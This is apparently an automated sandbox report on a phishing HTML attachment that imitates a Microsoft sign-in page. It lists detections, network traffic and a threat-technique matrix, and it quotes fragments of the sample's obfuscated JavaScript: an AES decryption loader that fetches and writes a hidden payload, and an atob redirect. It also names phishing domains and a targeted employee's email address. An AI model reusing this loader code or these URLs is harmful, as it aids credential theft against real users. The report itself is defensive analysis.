Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Play_VMNow-GlobalpCOINC.html

Overview

General Information

Sample name:Play_VMNow-GlobalpCOINC.html
Analysis ID:1500775
MD5:e385371da3811f933910ac0ac3816597
SHA1:1b1666cbeb808c71729e28dc7f2c808e794f1601
SHA256:70c846a3bcc65bc6822235cc87222330fac88692f56864ee9d493e9b3b5f45f5

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish10
HTML document with suspicious name
HTML document with suspicious title
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Play_VMNow-GlobalpCOINC.html MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 4536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1972,i,15768461243974921066,18200581235965833694,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
4.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==LLM: Score: 8 Reasons: The domain 'pulseliftoi.pl' is not a typical domain for Microsoft, as the company's official domain is'microsoft.com'. This discrepancy raises suspicions about the authenticity of the webpage. The presence of a login page with a 'Forgot my password' link is a common feature of phishing sites, which aims to trick users into providing their login credentials. The minimalistic design of the webpage and the unusual domain name suggest that the site may be a phishing attempt to steal Microsoft user credentials. Although the brand name 'Microsoft' is present, the URL and domain do not match the legitimate domain associated with the brand, indicating a high likelihood of phishing activity. DOM: 4.5.pages.csv
    Source: Yara matchFile source: 4.6.pages.csv, type: HTML
    Source: file:///C:/Users/user/Desktop/Play_VMNow-GlobalpCOINC.htmlTab title: Play_VMNow-GlobalpCOINC.html
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: https://gstfreeks.ru///1335.php
    Source: https://50ou-vasil-levski.com/tvavx.phpHTTP Parser: eslifka@globalp.com
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: window.location.href = atob(
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==Matcher: Template: captcha matched
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==Matcher: Template: captcha matched
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: async function abetter(tableware) { <!-- <span>a cars design reflects the dreams of its driver.</span> --> var {a,b,c,d} = json.parse(tableware); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- the road is an endless adventure waiting to be driven. --> } (async () => { document.write(await abetter(await (await fetch(await abetter(atob(`eyjhijoiafbqtwdhm29dndzbekhkqxjzbzlpvkrvtdb1tw8rbwlmtejfulira0t1ut0ilcjjijoiztdiogjlmwexyjhlmdvhogexngi2m2yxmtnhm2rjotgilcjiijoimdu2nzg4zjk1yju5otk4ztk4mgi4zdi0otezyjblmtlmn2iwzdfkzdfjztywntu3zgu5owixn2viyzkzyzrjotg5ywe1zdg2mzljoge1yzhlnjbknwe2ndfmmtc3zddlngu0ndviyjaxnti3yzjlodq3mjjmzgmxyty5mwuyzjk4ntc2mji3odzkmtmxyti2m2ziode2yzgzogm4mdyymju5mdg2mjnjogflytrkzjq2ndkzzjhjzmvmmta1mdq5zmm1zda4ztkxndbmywnjzdbhzdlkmdu5ytc3zmvmndg3ngrkyjc4otljmdnlmtqyywi1ndllowrin2i...
    Source: https://50ou-vasil-levski.com/tvavx.php?2-797967704b536932307463764b4d30705473334a5443764a7a395172794e45335354464b6a74494841413d3d-farawayHTTP Parser: var significant= document.createelement("script");significant.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(significant);significant.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoit05bothvanvmdkdyckzczjnubmlkbe9rwfltwcttwexcaxn2dg5ushnqoxnndvbwa1vwztbhwny4shdlmgxmeefgshmxbeo1wnpoew1jxc9rm05lv1vvzhvevhrkqjnerwjgtu43swfqv3zjtkrjeu9pa1zltnl4anvzznjpbe9mulhclzzwblh4ruvlznhqvklfnkzlnglca3crc3nta1wvcm04q3hjavwvb1fjs0nmetnfv1bzsefcl2vdm29hmze1tmn4duduv1l4v0g4rjyzdldlbkxqy3dmz2jpc3zydgxjshrqt0q2m1pzmdzvexlvb2d3qzryufzoznq4wlr1vgg4udfyr000u2pyavv4oun6c3z4dw5node2uwhjm2lmthzbndbjohlbdlowtllxzuxosnhhogdetdk4bupoykiwqnurduq1sen5vmgyr25lvzyystdrzgm5swn6dxzgdzrubzhkctlrvtd3bwo2ogo1tjhuaxc0mtdamjbkalp6mzdfyjjuumr5nec4ehdytmd3blhfzu54b0pcl05hwhhpuk1mnnazcitxbvwvk0v0adrostf6oue1dm9hzjbroeldm2fym3m5utlhogpmsvm3vmdmm3u4qvjkrni2smo5etjkbet1sg1rdgzoyupya2fkvxvtwnbdbvpoujr4shy0uk45s1krog0yswtetwvqsk5fvxltsfgzwddhn0lcl3o2uw93zelbrnpvwxrfymxpc0e...
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: Number of links: 0
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: Total embedded image size: 45708
    Source: file:///C:/Users/user/Desktop/Play_VMNow-GlobalpCOINC.htmlHTTP Parser: Base64 decoded: eslifka@globalp.com
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: Title: Sign in to your account does not match URL
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Desktop/Play_VMNow-GlobalpCOINC.htmlHTTP Parser: No favicon
    Source: https://50ou-vasil-levski.com/tvavx.phpHTTP Parser: No favicon
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No favicon
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No favicon
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No favicon
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No favicon
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No <meta name="author".. found
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No <meta name="author".. found
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No <meta name="copyright".. found
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.18:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.18:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.18:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.18:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.18:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.14:443 -> 192.168.2.18:49762 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.160:443 -> 192.168.2.18:49763 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.18:49713 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.106.86.13
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: 50ou-vasil-levski.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: pulseliftoi.pl
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: gstfreeks.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.18:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.22:443 -> 192.168.2.18:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.106.86.13:443 -> 192.168.2.18:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.18:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.18:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.18:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.14:443 -> 192.168.2.18:49762 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.160:443 -> 192.168.2.18:49763 version: TLS 1.2

    System Summary

    barindex
    Source: Name includes: Play_VMNow-GlobalpCOINC.htmlInitial sample: play
    Source: classification engineClassification label: mal92.phis.evad.winHTML@18/6@32/165
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Play_VMNow-GlobalpCOINC.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1972,i,15768461243974921066,18200581235965833694,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1972,i,15768461243974921066,18200581235965833694,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Data Obfuscation

    barindex
    Source: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==HTTP Parser: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
